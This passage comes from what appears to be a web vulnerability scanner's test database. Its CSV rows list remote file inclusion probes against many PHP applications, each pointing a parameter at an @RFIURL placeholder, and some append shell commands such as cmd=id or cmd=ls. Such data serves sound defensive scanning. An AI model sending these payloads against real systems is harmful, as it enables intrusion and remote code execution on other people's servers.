list.\",\"\",\"\"\n\"005496\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005497\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005498\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news/include/createdb.php?langfile;=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005499\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news/include/customize.php?l=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005500\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news/newstopic_inc.php?indir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005501\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news/scripts/news_page.php?script_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005502\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/newsadmin.php?action=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005503\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/newsarchive.php?path_to_script=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005504\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/newsfeeds/includes/aggregator.php?zf_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005505\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/newsfeeds/includes/controller.php?zf_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005506\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/newsletter/newsletter.php?waroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005507\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/newsp/lib/class.Database.php?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005508\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/newticket.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005509\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005510\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/noticias.php?inc=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005511\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/nucleus/plugins/skinfiles/index.php?DIR_LIBS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005512\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/nuke_path/iframe.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005513\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/nukebrowser.php?filnavn=@RFIURL&filhead=XXpathXX&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005514\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005515\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005516\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/oaboard_en/forum.php?inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005517\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ocp-103/index.php?req_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005518\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ocs/include/footer.inc.php?fullpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005519\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ocs/include/theme.inc.php?fullpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005520\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005521\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/olbookmarks-0.7.4/themes/test1.php?@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005522\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/oneadmin/adminfoot.php?path[docroot]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005523\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/oneadmin/blogger/sampleblogger.php?path[docroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005524\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/oneadmin/config-bak.php?include_once=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005525\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/oneadmin/config.php?path[docroot]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005526\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005527\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/online.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005528\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005529\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/openi-admin/base/fileloader.php?config[openi_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005530\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/openrat/themes/default/include/html/insert.inc.php?tpl_dir=@RFIURL???\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005531\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005532\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ops/gals.php?news_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005533\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/order/login.php?svr_rootscript=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005534\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/osData/php121/php121db.php?php121dir=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005535\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005536\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005537\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/owimg.php3?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005538\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/p-news.php?pn_lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005539\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pafiledb/includes/pafiledb_constants.php?module_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005540\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/page.php?goto=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005541\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/page.php?id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005542\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/panel/common/theme/default/header_setup.php?path[docroot]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005543\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/param_editor.php?folder=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005544\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/parse/parser.php?WN_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005545\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/patch/?language_id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005546\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/patch/tools/send_reminders.php?noSet=0&includedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005547\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/paypalipn/ipnprocess.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005548\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pda/pda_projects.php?offset=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005549\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phfito/phfito-post?SRC_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005550\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005551\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/photo_comment.php?toroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005552\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/php-inc/log.inc.php?SKIN_URL=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005553\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/php-include-robotsservices.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005554\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005555\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/php.incs/common.inc.php?cm_basedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005556\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/php/init.gallery.php?include_class=@RFIURL/something\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005557\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/php121db.php?php121dir=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005558\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/php4you.php?dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005559\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005560\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpBB2/shoutbox.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005561\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpCards.header.php?CardPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005562\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005563\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpMyChat.php3?=@RFIURL?cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005564\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005565\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005566\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005567\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpbb/sendmsg.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005568\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpcalendar/includes/calendar.php?phpc_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005569\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpcalendar/includes/setup.php?phpc_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005570\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpdebug_PATH/test/debug_test.php?debugClassLocation=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005571\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005572\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005573\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phphd_downloads/common.php?phphd_real_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005574\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phphost_directoryv2/include/admin.php?rd=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005575\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phphtml.php?htmlclass_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005576\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpi/edit_top_feature.php?include_connection=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005577\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpi/edit_topics_feature.php?include_connection=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005578\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/site_conf.php?ordnertiefe=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005579\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005580\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005581\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005582\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005583\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005584\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005585\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/module/referenz.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005586\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005587\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005588\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005589\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005590\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phplinks/includes/smarty.php?full_path_to_public_program=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005591\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005592\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005593\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phppc/poll.php?is_phppc_included=1&relativer_pfad=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005594\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005595\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005596\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpquickgallery/gallery_top.inc.php?textFile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005597\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpreactor/inc/polls.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005598\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpreactor/inc/updatecms.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005599\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpreactor/inc/users.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005600\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpreactor/inc/view.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005601\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpress/adisplay.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005602\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpunity-postcard.php?plgallery_epost=1&gallery_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005603\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005604\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005605\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/phpyabs/moduli/libri/index.php?Azione=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005606\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005607\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/playlist.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005608\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugin/HP_DEV/cms2.php?s_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005609\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugin/HP_DEV/cms2.php?s_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005610\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/plugin/gateway/gnokii/init.php?apps_path[plug]=@RFIURL?\",\"GET\",\"BODY:PHP 